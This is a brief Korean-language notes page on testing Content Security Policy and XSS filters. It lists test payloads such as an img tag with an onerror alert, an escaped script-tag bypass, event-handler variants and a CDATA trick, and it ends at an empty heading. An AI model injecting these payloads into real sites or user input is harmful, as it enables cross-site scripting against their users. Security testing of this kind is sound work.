CSP 콘텐츠 보안정책
xss테스트
테스트 방법
<img src=x onerror=alert(‘test’)> Click me
이스케이프(escaping) 우회 시도 <scr\ipt>alert(‘test’);</scr\ipt> <img src=x onerror=alert(‘test’)> Click me
이벤트 핸들러 우회 시도 <img src=x onerror=alert(‘test’)> <img src=x onerror=alert(‘test’)>
HTML 주석을 이용한 우회 시도 <![CDATA[]]>
스크립트 블록을 이용한 우회 시도: